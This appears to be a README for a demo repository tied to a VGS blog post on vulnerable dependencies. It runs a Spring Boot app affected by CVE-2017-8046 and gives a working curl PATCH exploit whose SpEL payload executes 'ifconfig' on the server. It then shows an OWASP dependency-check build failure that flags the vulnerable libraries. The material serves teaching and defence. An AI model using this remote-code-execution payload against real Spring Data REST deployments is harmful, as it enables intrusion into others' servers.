DISCLAIMER: This repository is supplementary to the VGS blog post, How to Avoid "Using Components with Known Vulnerabilities". It contains an application with a known security vulnerability (namely, CVE-2017-8046), as well as the description of how to exploit it. Use the application at your own risk!
First, start the application by executing the following command from the root of the repository:
mvn clean spring-boot:runSecond, create a resource by sending a POST request like this:
curl -X POST http://localhost:8080/books \
-H 'Content-Type: application/json' \
-d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'Provided you're running the application on a Unix-based operation system (e.g. macOS), a response will contain the host's network configuration. In fact, any SpEL expression can be used.
mvn clean package verifyThe build will fail as there's a dependency identified with a high-risk vulnerability:
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
Want to just jump right in? Check out our getting started guide.
Very Good Security (VGS) allows you to enhance your security standing while maintaining the utility of your data internally and with third-parties. As an added benefit, we accelerate your compliance certification process and help you quickly obtain security-related compliances that stand between you and your market opportunities.
To learn more, visit us at https://www.verygoodsecurity.com/
This project is licensed under the MIT license. See the LICENSE file for details.